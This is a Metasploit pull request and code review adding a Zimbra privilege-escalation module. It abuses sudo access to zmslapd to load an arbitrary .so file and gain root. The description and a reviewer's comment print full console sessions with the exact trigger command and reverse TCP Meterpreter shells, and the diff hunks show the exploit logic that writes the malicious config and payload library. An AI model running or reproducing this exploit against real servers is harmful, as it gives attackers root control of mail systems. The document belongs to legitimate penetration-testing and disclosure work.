### PR TITLE
New module for 0-day Zimbra privilege escalation ("slapper")

### PR DESCRIPTION
**Pull request by rbowes-r7**
This adds a local exploit for Zimbra, to go from the `zimbra` user to `root` by using a sudo-able executable that can load an arbitrary .so file. This was [publicly disclosed in October of 2021](https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/), but I'm not sure that anybody reported it to Zimbra. (I reported it today, have not heard back yet)

Note that this is branched off of https://github.com/rapid7/metasploit-framework/pull/16796 since it goes with that module (and is what I'm using for testing) - I'm happy to re-base if that's a problem!

## Verification

Install Zimbra (sorry) on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...

```
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                  Connection
  --  ----  ----                   -----------                  ----------
  10        meterpreter x86/linux  zimbra @ zimbra.example.org  10.0.0.146:4444 -> 10.0.0.154:39800 (10.0.0.154)

msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 10
SESSION => 10
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target is vulnerable.
[*] Creating exploit directory: /tmp/.5kq9XO
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.5kq9XO/.1wNk1h3
[*] Sending stage (3020772 bytes) to 10.0.0.154
[+] Deleted /tmp/.5kq9XO
[*] Meterpreter session 13 opened (10.0.0.146:4444 -> 10.0.0.154:40044) at 2022-07-21 14:04:12 -0700

meterpreter > getuid
Server username: root
```

### CODE REVIEW

**Comment by h00die** [comment]
https://www.youtube.com/watch?v=qPr-xsQvhgw

**Comment by bwatters-r7** [comment]
This PR shares code and has dependencies from https://github.com/rapid7/metasploit-framework/pull/16794 and should be landed after it.

File: modules/exploits/linux/local/zimbra_slapper_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,134 @@
...
+      print_error('Current user could not execute sudo -l')
+      return CheckCode::Safe
+    end
+
+    if !output.include?("(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd")
+      print_error('Current user does not have access to run zmslapd')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
```
Comment (bwatters-r7) [inline modules/exploits/linux/local/zimbra_slapper_priv_esc.rb:98]: This should likely be `Appears`:
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html

File: modules/exploits/linux/local/zimbra_slapper_priv_esc.rb [hunk 2]
```diff
@@ -0,0 +1,134 @@
...
+
+    # Create the .conf file
+    config = "modulepath #{exploit_dir}\nmoduleload #{library_name}\n"
+    write_file(config_path, config)
+
+    write_file(library_path, generate_payload_dll)
+
+    cmd = "sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}"
+    print_status "Attempting to trigger payload: #{cmd}"
+    cmd_exec(cmd)
```
Comment (bwatters-r7) [inline modules/exploits/linux/local/zimbra_slapper_priv_esc.rb:132]: Maybe grab the output in case of failure?

Comment (rbowes-r7) [reply modules/exploits/linux/local/zimbra_slapper_priv_esc.rb]: To answer my own question, I updated this to check `session_created?` and that seems to work great!

**Comment by cdelafuente-r7** [comment]
I just tested against Zimbra Collaboration 8.8.15 Patch 31 on Ubuntu 18.04 and it works great! I used CVE-2022-30333 - path traversal vulnerability in UnRAR to get a session first.

- Exemple output
```
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions

Active sessions
===============

  Id  Name  Type                   Information                         Connection
  --  ----  ----                   -----------                         ----------
  1         meterpreter x64/linux  zimbra @ mail.donotexistdomain.foo  10.0.0.1:4444 -> 10.0.0.22:38822 (10.0.0.22)

msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > use exploit/linux/local/zimbra_slapper_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit verbose=true lhost=10.0.0.1 SESSION=1

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Executing: sudo -n -l
[+] The target appears to be vulnerable.
[*] Creating exploit directory: /tmp/.ng58U2
[*] Creating directory /tmp/.ng58U2
[*] /tmp/.ng58U2 created
[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.ng58U2/.SD4X0GB
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.1
[+] Deleted /tmp/.ng58U2
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.1:58877) at 2022-08-09 18:03:06 +0200


meterpreter >
meterpreter > sysinfo
Computer     : mail.donotexistdomain.foo
OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.

**Comment by fevar54** [comment]
you have resulting indicators of compromise to your test...
Thank you

**Pull request merged**